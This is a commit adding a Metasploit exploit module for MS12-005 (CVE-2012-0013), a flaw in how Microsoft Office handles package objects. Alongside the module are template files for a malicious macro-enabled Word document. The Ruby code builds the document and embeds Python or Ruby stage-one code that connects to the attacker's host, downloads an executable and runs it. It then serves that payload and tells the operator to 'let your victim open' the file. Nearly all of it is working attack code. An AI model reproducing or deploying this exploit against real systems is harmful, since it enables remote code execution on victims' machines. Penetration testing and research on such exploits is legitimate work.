Add MS12-005 (CVE-2012-0013) exploit

2012-06-10 01:08:28 -05:00 · 2012-06-10 01:08:28 -05:00 · 4743c9fb33
parent a9ee2b3480
commit 4743c9fb33
18 changed files with 278 additions and 0 deletions
--- a/data/exploits/CVE-2012-0013/[Content_Types].xml
+++ b/data/exploits/CVE-2012-0013/[Content_Types].xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="emf" ContentType="image/x-emf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/stylesWithEffects.xml" ContentType="application/vnd.ms-word.stylesWithEffects+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
--- a/data/exploits/CVE-2012-0013/_rels/__rels
+++ b/data/exploits/CVE-2012-0013/_rels/__rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
--- a/data/exploits/CVE-2012-0013/docProps/app.xml
+++ b/data/exploits/CVE-2012-0013/docProps/app.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>1</TotalTime><Pages>1</Pages><Words>2</Words><Characters>13</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>14</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>
--- a/data/exploits/CVE-2012-0013/docProps/core.xml
+++ b/data/exploits/CVE-2012-0013/docProps/core.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>Windows User</dc:creator><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>2</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:modified></cp:coreProperties>
--- a/data/exploits/CVE-2012-0013/word/_rels/document.xml.rels
+++ b/data/exploits/CVE-2012-0013/word/_rels/document.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/></Relationships>
--- a/data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels
+++ b/data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>
--- a/data/exploits/CVE-2012-0013/word/document.xml
+++ b/data/exploits/CVE-2012-0013/word/document.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p w:rsidR="00EB5F66" w:rsidRDefault="006042EE"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:r><w:rPr><w:noProof/></w:rPr><w:pict><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:80.2pt;height:40.5pt;z-index:-251657216;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text"><v:imagedata r:id="rId6" o:title=""/></v:shape><o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1400592552" r:id="rId7"/></w:pict></w:r><w:bookmarkEnd w:id="0"/><w:r><w:t>W00TW00T</w:t></w:r></w:p><w:sectPr w:rsidR="00EB5F66"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
--- a/data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin
+++ b/data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin
--- a/data/exploits/CVE-2012-0013/word/fontTable.xml
+++ b/data/exploits/CVE-2012-0013/word/fontTable.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>
--- a/data/exploits/CVE-2012-0013/word/media/image1.emf
+++ b/data/exploits/CVE-2012-0013/word/media/image1.emf
--- a/data/exploits/CVE-2012-0013/word/settings.xml
+++ b/data/exploits/CVE-2012-0013/word/settings.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="14"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="002B771F"/><w:rsid w:val="002B771F"/><w:rsid w:val="006042EE"/><w:rsid w:val="00EB5F66"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1027"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>
--- a/data/exploits/CVE-2012-0013/word/styles.xml
+++ b/data/exploits/CVE-2012-0013/word/styles.xml
--- a/data/exploits/CVE-2012-0013/word/stylesWithEffects.xml
+++ b/data/exploits/CVE-2012-0013/word/stylesWithEffects.xml
--- a/data/exploits/CVE-2012-0013/word/theme/theme1.xml
+++ b/data/exploits/CVE-2012-0013/word/theme/theme1.xml
--- a/data/exploits/CVE-2012-0013/word/vbaData.xml
+++ b/data/exploits/CVE-2012-0013/word/vbaData.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
--- a/data/exploits/CVE-2012-0013/word/vbaProject.bin
+++ b/data/exploits/CVE-2012-0013/word/vbaProject.bin
--- a/data/exploits/CVE-2012-0013/word/webSettings.xml
+++ b/data/exploits/CVE-2012-0013/word/webSettings.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:optimizeForBrowser/><w:allowPNG/></w:webSettings>
--- a/modules/exploits/windows/fileformat/ms12_005.rb
+++ b/modules/exploits/windows/fileformat/ms12_005.rb
@ -0,0 +1,250 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::FILEFORMAT
+	include Msf::Exploit::EXE
+	include Msf::Exploit::Remote::TcpServer
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",
+			'Description'    => %q{
+					This module exploits a vulnerability found in Microsoft Office's ClickOnce
+				feature.  When handling a Macro document, the application fails to recognize
+				certain file extensions as dangerous executables, which can be used to bypass
+				the warning message.  This allows you to trick your victim into opening the
+				malicious document, which will load up either a python or ruby payload based on
+				your choosing, and then finally download and execute our executable.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Yorick Koster', #Vuln discovery
+					'sinn3r'         #Metasploit
+				],
+			'References'     =>
+				[
+					['CVE', '2012-0013'],
+					['OSVDB', '78207'],
+					['MSB', 'ms12-005'],
+					['BID', '51284'],
+					['URL', 'http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146'],
+					['URL', 'http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/']
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction'          => "none",
+					'DisablePayloadHandler' => 'false'
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Microsoft Office Word 2007/2010 on Windows 7', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jan 10 2012",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptEnum.new('PAYLOAD_TYPE', [true, "The initial payload type", 'PYTHON', %w(RUBY PYTHON)]),
+					OptString.new("BODY", [false, 'The message for the document body', '']),
+					OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
+				], self.class)
+	end
+
+
+	#
+	# Return the first-stage payload that will download our malicious executable.
+	#
+	def get_download_exec_payload(type, lhost, lport)
+		payload_name = Rex::Text.rand_text_alpha(7)
+
+		# Padd up 6 null bytes so the first few characters won't get cut off
+		p = "\x00"*6
+
+		case type
+		when :rb
+			p << %Q|
+			require 'socket'
+			require 'tempfile'
+			begin
+				cli = TCPSocket.open("#{lhost}",#{lport})
+				buf = ''
+				while l = cli.gets
+					buf << l
+				end
+				cli.close
+				tmp = Tempfile.new(['#{payload_name}','.exe'])
+				t = tmp.path
+				tmp.binmode
+				tmp.write(buf)
+				tmp.close
+				exec(t)
+			rescue
+			end#|
+
+		when :py
+			p << %Q|
+			import socket
+			import tempfile
+			import os
+
+			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+			s.connect(("#{lhost}", #{lport}))
+			buf = ""
+			while True:
+				data = s.recv(1024)
+				if data:
+					buf += data
+				else:
+					break
+			s.close
+			temp = tempfile.gettempdir() + "\\\\\\" + "#{payload_name}.exe"
+			f = open(temp, "wb")
+			f.write(buf)
+			f.close
+			f = None
+			os.system(temp)
+			#|
+
+		end
+
+		p = p.gsub(/^\t\t\t/, '')
+
+		return p
+	end
+
+
+	#
+	# Reads a file that'll be packaged.
+	# This will patch certain files on the fly, or return the original content of the file.
+	#
+	def on_file_read(fname, file)
+		f = open(file, 'rb')
+		buf = f.read
+		f.close
+
+		# Modify certain files on the fly
+		case file
+		when /oleObject1\.bin/
+			# Patch the OLE object file with our payload
+			print_status("Patching OLE object")
+			ptype = datastore['PAYLOAD_TYPE'] == 'PYTHON' ? :py : :rb
+			p     = get_download_exec_payload(ptype, @ip, @port)
+			buf   = buf.gsub(/MYPAYLOAD/, p)
+
+			# Patch username
+			username = Rex::Text.rand_text_alpha(5)
+			buf = buf.gsub(/METASPLOIT/, username)
+			buf = buf.gsub(/#{Rex::Text.to_unicode("METASPLOIT")}/, Rex::Text.to_unicode(username))
+
+			# Patch the filename
+			f = Rex::Text.rand_text_alpha(6)
+			buf = buf.gsub(/MYFILENAME/, f)
+			buf = buf.gsub(/#{Rex::Text.to_unicode("MYFILENAME")}/, Rex::Text.to_unicode(f))
+
+			# Patch the extension name
+			ext = ptype.to_s
+			buf = buf.gsub(/MYEXT/, ext)
+			buf = buf.gsub(/#{Rex::Text.to_unicode("MYEXT")}/, Rex::Text.to_unicode(ext))
+
+		when /document\.xml/
+			print_status("Patching document body")
+			# Patch the docx body
+			buf = buf.gsub(/W00TW00T/, datastore['BODY'])
+
+		end
+
+		# The original filename of __rels is actually ".rels".
+		# But for some reason if that's our original filename, it won't be included
+		# in the archive. So this hacks around that.
+		case fname
+		when /__rels/
+			fname = fname.gsub(/\_\_rels/, '.rels')
+		end
+
+		yield fname, buf
+	end
+
+
+	#
+	# Packages the Office Macro Document
+	#
+	def package_docm_rex(path)
+		zip = Rex::Zip::Archive.new
+
+		Dir["#{path}/**/**"].each do |file|
+			p = file.sub(path+'/','')
+
+			if File.directory?(file)
+				print_status("Packging directory: #{file}")
+				zip.add_file(p)
+			else
+				on_file_read(p, file) do |fname, buf|
+					print_status("Packaging file: #{fname}")
+					zip.add_file(fname, buf)
+				end
+			end
+		end
+
+		zip.pack
+	end
+
+
+	#
+	# Return the malicious executable
+	#
+	def on_client_connect(cli)
+		print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@exe.length.to_s} bytes)")
+		cli.put(@exe)
+		service.close_client(cli)
+	end
+
+
+	def exploit
+		@ip    = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+		@port  = datastore['SRVPORT']
+
+		print_status("Generating our docm file...")
+		path  = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2012-0013')
+		docm = package_docm_rex(path)
+
+		file_create(docm)
+		print_good("Let your victim open #{datastore['FILENAME']}")
+
+		print_status("Generating our malicious executable...")
+		@exe = generate_payload_exe
+
+		print_status("Ready to deliver your payload on #{@ip}:#{@port.to_s}")
+		super
+	end
+end
+
+=begin
+mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c 
+1c1
+< void *__thiscall CPackage::_GetCurrentIcon(void *this, int a2)
+---
+> const WCHAR *__thiscall CPackage::_GetCurrentIcon(void *this, int a2)
+...
+24c24
+<     if ( AssocIsDangerous(result) || !SHGetFileInfoW(pszPath, 0x80u, &psfi, 0x2B4u, 0x110u) )
+---
+>     if ( IsProgIDInList(0, result, extList, 0x11u) || !SHGetFileInfoW(pszPath, 0x80u, &psfi, 0x2B4u, 0x110u) )
+31c31
+=end